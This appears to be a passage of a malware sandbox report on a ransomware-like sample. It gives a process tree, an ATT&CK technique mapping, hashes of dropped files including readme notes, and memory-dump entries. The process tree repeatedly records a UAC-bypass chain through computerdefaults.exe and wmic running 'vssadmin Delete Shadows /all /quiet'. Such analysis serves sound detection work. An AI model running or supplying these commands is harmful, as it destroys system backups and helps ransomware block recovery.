- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4332
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3548

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2672

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4656
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4060
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3704

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5600

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5424

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5776
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5820
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5936

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3728

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3764
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5588
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3340

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5808

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5944

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2068

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3304

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5524
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5660
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5840

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2536
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3092
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4924

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5124
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5520
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5200

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5328
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3752
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5732

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5060

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3292

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2656

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2276

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5816
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4732
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3152

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3088

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:976
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1340
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4724

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5192

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5332

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5900

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5940
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1840
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5428

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4596
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5200
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5968
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4972

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1968

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1768
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5860

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5580

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2240
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4732
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3576
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5732

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3440
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3996
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3796

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4224

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5896
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2592
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5852

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1320
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2432
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4256

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3340

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5072

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2496

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
443a627d539ca4eab732bad0cbe7332b

SHA1
86b18b906a1acd2a22f4b2c78ac3564c394a9569

SHA256
1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

SHA512
923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
99afa4934d1e3c56bbce114b356e8a99

SHA1
3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

SHA256
08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

SHA512
76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
9d8c42c5f7758f38aca6b50691892054

SHA1
5ceb2fe81c9b4050dfe34aa20293aeda68d1b962

SHA256
59e2bb03aa6a9267c0d43c00ace7debc0336a5c9a71fdb8f94ef902a2a3a9b37

SHA512
3bef33aa8bf9e4046ecfca7aba9fda5fb8505a8a6afec5f53baaf373f1bab3e4d52e17ee3497ed6e9bb751f75e486671312d40471564821bec4f5ed22d178449

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f08585d634e1da6c769a2f9a8fdf0dcf

SHA1
8ff3f49fdc416ff76b8174906359941fa1a7a097

SHA256
0285ecb936e8b08313a1b01cf2db1385da1958d0f92bbc59699fecda5c43eaa7

SHA512
5b36caafa54ea0d3ee8cad26c58b4080331a23bc61969a30c91e38bdb66444632573ddd96d71c86542b3d49736793d024db1483eeb84c4be3248b0b746f09c62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
78f4a425e7ed7029d88029297a834d30

SHA1
4eb5b888162eab4acf954b40c20f2560877dea8c

SHA256
aac9621a996a202911a5002f3e29dbc1600b795bac6194eed0d6eb1a4ddb022a

SHA512
a620bf1712462025e36aaeb7a9d8793256f84d06a335d04a0dfdd9caf7b1d4d713d7841055a0fac9ebb660455eaaccaa8cba3e799a46bc7c787603eb7a35c7aa

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133779325036628517.txt

Filesize
74KB

MD5
7cf0313b51ef4d9c63deb4e59ed77b9d

SHA1
41f8cf89cdf15dce7b58235cb069a5310806b9b1

SHA256
cb4eb4420c84c51cc72384a7334593489ef20c3cbe0053ec80fbc4044c76145c

SHA512
b31fa0b0821e1615b90688f7a2953145f575664e99867aca81fa5722bcdee209f9ea10406602a973acbe1aa2e6bd2a5a072792ad61f8a976fbf05928f6c2bc2b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

Filesize
7KB

MD5
8012bced2de58f7dd21f9721bdf770a5

SHA1
34599dcf0e630abdbae78f5c1e661d9df8587590

SHA256
9f1d05bcc0c8ac94ccadf1cc3e41706ae6b177e9c2d7abb18f7d24b10671f404

SHA512
b242fbe26bc01c9bac318e8a860fad0d229c0d06e11468a95b0658d74faa42cfee9074878e0f73953e565c608109115c35272c5be7d678a0f7dd3e87497b0641

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

Filesize
3KB

MD5
d5c577318fbe09353e29bf9e91247d04

SHA1
b7638cc2bdbdecf346c4a6bc93463681b089cfa7

SHA256
bad292239f517e5886e989f2ec372ea5389999d63bc89441211c8c2d064857db

SHA512
d7ce5116cf1f09e3ff574865a081fa7cea50096194687e15342e0d6d4623e44946be9fa0ef6bf185917f2925951fd4f29095e92d8dc221fd79bfbbf1ba526a09

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
8KB

MD5
6db4b9f5a70363d15c7e73c157d243bb

SHA1
00063db1063c4ee278b11d03fc4ab97a539164d2

SHA256
bc8d60b89ee934f52bb08d510f92bd94807171d0a9923b260e2e11dcedb9b417

SHA512
3c328b3092686eca79703b9ac5b7c39608d8d332cdf1becdb7d7c61fa5599667c8c730435d8e4573c649b352e8ddeed544e91194c1e495c5503117d1ea91a0f6

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
ed83fb90070a02af8dddffec265f4d66

SHA1
8ef80b7e9d48beed888ef04514795d6f2155096b

SHA256
1a9d3fabaa696272de7119564173e7e363249b2a60330df730ae72ca732ccf14

SHA512
59a0a939da0e99766d55d4390c9f91f98c02a9be55c803b0ad983480795a0e6b3b203ccec71ae8d69172bb0f550694ddf27f3966cb2a1f01fa47b70136e40bd7

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/2648-12-0x0000019B8DFA0000-0x0000019B8DFA5000-memory.dmp

Filesize
20KB

Download
memory/3844-432-0x00000265FCE60000-0x00000265FCE61000-memory.dmp

Filesize
4KB

Download
memory/3844-431-0x00000265FCFB0000-0x00000265FCFB8000-memory.dmp

Filesize
32KB

Download
memory/4028-8-0x000001F2DFFB0000-0x000001F2DFFB1000-memory.dmp

Filesize
4KB

Download
memory/4028-9-0x000001F2DFFC0000-0x000001F2DFFC1000-memory.dmp

Filesize
4KB

Download
memory/4028-6-0x000001F2DFF60000-0x000001F2DFF61000-memory.dmp

Filesize
4KB

Download
memory/4028-10-0x000001F2DFFE0000-0x000001F2DFFE1000-memory.dmp

Filesize
4KB

Download
memory/4028-11-0x000001F2E00A0000-0x000001F2E00A1000-memory.dmp

Filesize
4KB

Download
memory/4028-7-0x000001F2DFF70000-0x000001F2DFF71000-memory.dmp

Filesize
4KB

Download
memory/4028-0-0x000001F2DF890000-0x000001F2DFF0C000-memory.dmp

Filesize
6.5MB

Download
memory/4028-1-0x000001F2DFF10000-0x000001F2DFF11000-memory.dmp

Filesize
4KB

Download
memory/4028-2-0x000001F2DFF20000-0x000001F2DFF21000-memory.dmp

Filesize
4KB

Download
memory/4028-3-0x000001F2DFF30000-0x000001F2DFF31000-memory.dmp

Filesize
4KB

Download
memory/4028-4-0x000001F2DFF40000-0x000001F2DFF41000-memory.dmp

Filesize
4KB

Download
memory/4028-5-0x000001F2DFF50000-0x000001F2DFF51000-memory.dmp

Filesize
4KB

Download